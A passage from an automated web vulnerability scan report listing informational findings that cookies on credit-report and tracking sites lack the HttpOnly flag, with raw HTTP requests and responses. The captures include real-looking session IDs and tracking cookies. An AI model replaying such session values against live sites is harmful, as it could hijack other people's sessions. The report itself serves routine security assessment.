Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 31547

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           CreditReport.com | Credit Report and Credit Score Online by Expe
...[SNIP]...

18.452. https://www.creditreport.com/dni/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /dni/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/javascripts/s_code.axd HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:38:44 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=bed8726fe4b94ccc89c91d5fe012c5e9; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:38:44 GMT
ETag: "pvc86e2c59b0f7c48f210aad06b63ccdc7"
Expires: Wed, 27 Apr 2011 00:38:44 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C94085.A70594.RA70541.G11457.U58DF84F2].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65890

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expimnicrlive, expiglobal"

var s=s_g
...[SNIP]...

18.453. https://www.creditreport.com/dni/time-out.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /dni/time-out.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/time-out.aspx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox=session#1303691695619-486775#1303693798|PC#1303691695619-486775.17#1304901538|check#true#1303691998; mbox-experianuk=session#1303691695624-816974#1303693799|check#true#1303691998; mbox-experian=session#1303691695628-869024#1303693799|check#true#1303691999; mbox-protectmyidcom=session#1303691695631-207802#1303693799|check#true#1303691999; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20s_lv%3D1303691939108%7C1398299939108%3B%20s_lv_s%3DFirst%2520Visit%7C1303693739108%3B%20sc_dl%3D1%7C1303693739214%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.creditreport.com%252Fdni%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DC2TDM%2526SiteVersionID%253D967%2526SiteID%253D100332%2526sc%253D671917%2526bcd%253Dcomptst%7C1303693739223%3B%20gpv_PN%3D100332%253Adni%253Aorder1.aspx%7C1303693739231%3B; s_sess=%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20s_cc%3Dtrue%3B%20sc_cp_channel%3D0%3B%20sc_cp_paid%3D0%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=Order1+Error+Order1+Error+Order1+time-out; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 6:36:22 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=2a0ea07e078d45acbe75184e6bfdf00f; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:36:22 GMT
ETag: "pvfb53f30d38bdcd61e442d0aa9c8449f1"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.U263B78D6].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 9883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           CreditReport.com | Credit Report and Credit Score Online by Exper
...[SNIP]...

18.454. http://www.discountasp.net/tfs/go/go.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discountasp.net
Path:   /tfs/go/go.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tfs/go/go.aspx?i=15253 HTTP/1.1
Host: www.discountasp.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.discountasp.net/tfs/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2ox1ajmz01t5fmibb151guvl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: safe_cookie21=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322329056889&r=&ip=2915161843; expires=Tue, 24-Apr-2012 15:57:12 GMT; path=/
Set-Cookie: safe_cookie22=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322329056889&r=&ip=2915161843; expires=Tue, 24-Apr-2012 15:57:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:12 GMT
Content-Length: 148

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.discountasp.net/tfs/">here</a>.</h2>
</body></html>

18.455. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emjcd.com
Path:   /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s%3Cdkp!x7ry-t2xepAz%3Ciuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98%3C%3CH%3C%3C HTTP/1.1
Host: www.emjcd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.emjcd.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:10:08 GMT
Location: https://www.econsumer.equifax.com/consumer/landing.ehtml?%5estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a+identity+theft+resource_ordering34--2011-04-23--20-10-04CD1
Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.emjcd.com; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.emjcd.com; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Set-Cookie: PBLP=1501737:1911961:1303614608209; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:10:08 GMT
Content-Length: 517

<html>
<head><meta http-equiv="redirect" content="https://www.econsumer.equifax.com/consumer/landing.ehtml?%5estart=&amp;companyName=cj_esnp3r&amp;AID=10751987&amp;PID=1911961&amp;SID=gid9a+identity+t
...[SNIP]...

18.456. http://www.etracker.de/cnt.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.etracker.de
Path:   /cnt.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt.php?v=3.0&java=y&tc=1303676886871&et_tz=300&et=DKbXhb&et_ilevel=1&swidth=1920&sheight=1200&siwidth=1034&siheight=871&scookie=1&scolor=16&et_pagename=__INDEX__GfK%2520Gruppe%2520(1)&et_target=,0,0,0,0&et_url=http%3A%2F%2Fwww.gfk.com%2Fgroup%2Findex.de.html&slang=en-US&ref=http%3A%2F%2Fsensic.net%2F&p=Shockwave%20Flash%2010.2%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%201.6.0_24%3BSilverlight%20%204.0.60129.0%3BChrome%20PDF%20Viewer%3BJavascript%201.7 HTTP/1.1
Host: www.etracker.de
Proxy-Connection: keep-alive
Referer: http://www.gfk.com/group/index.de.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Wed, 11 Nov 1998 11:11:11 GMT
P3P: CP="NON DSP NID CURa OUR IND UNI"
Set-Cookie: etcnt_252902=5350ea7e81b332860dbc86227301aa20%2C1303677347%2C1; expires=Sun, 22-May-2011 20:35:47 GMT; path=/
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Date: Sun, 24 Apr 2011 20:35:47 GMT
Connection: close
Last-Modified: Sun, 24 Apr 2011 20:35:47 GMT
Server: Apache
Content-Type: image/gif
Pragma: no-cache

GIF89a.............!.......,...........D..;

18.457. http://www.experiandirect.com/triplealert/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experiandirect.com
Path:   /triplealert/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/javascripts/s_code.axd HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
Referer: http://www.experiandirect.com/triplealert/default.aspx?sc=668715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 65895
Content-Type: text/javascript; charset=utf-8
Expires: Mon, 01 Jan 0001 00:00:00 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Set-Cookie: OriginalReferrer=experiandirect.com/triplealert; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=default+s_code.axd; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 12:46:29 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=9bc0f98b2d9b414ca40110f3d77888da; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:46:29 GMT

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expiglobal,expitriplealertlive"

var
...[SNIP]...

18.458. https://www.experiandirect.com/TRIPLEALERT/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /TRIPLEALERT/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TRIPLEALERT/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NavFlowID=; NumTrialDaysLeft=; OriginalReferrer=experiandirect.com/triplealert; MachineName=IRC-P2WEB-16; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 12:49:23 PM; UID=8c28239441c74e2395ab5003d18798d0; ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:49:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd+ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 12:49:27 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: public
Last-Modified: Sun, 24 Apr 2011 19:49:27 GMT
ETag: e39efd15dfddf96518fda29573493237
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 875

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpSubmit =
...[SNIP]...

18.459. https://www.experiandirect.com/triplealert/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /triplealert/Message.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/Message.aspx?PageTypeID=SessionTimeOut HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20s_lv%3D1303674590959%7C1398282590959%3B%20s_lv_s%3DFirst%2520Visit%7C1303676390959%3B%20sc_dl%3D1%7C1303676391021%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DBCZ1Y%2526SiteVersionID%253D473%2526SiteID%253D100173%2526sc%253D668715%2526bcd%253D%7C1303676391080%3B%20gpv_PN%3D100173%253Atriplealert%253Aorder1.aspx%7C1303676391140%3B; s_sess=%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20sc_cp_channel%3D0%3B%20s_cc%3Dtrue%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:27:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: OriginalReferrer=experiandirect.com/triplealert; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=Message?PageTypeID=SessionTimeOut+s_code.axd+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Message?PageTypeID=SessionTimeOut; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 1:27:29 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=f7dcb47c1df0490c9c9543b65f582e1a; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 10179

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           TripleAlert.com
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <meta nam
...[SNIP]...

18.460. https://www.experiandirect.com/triplealert/Order1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=657900&bcd= HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
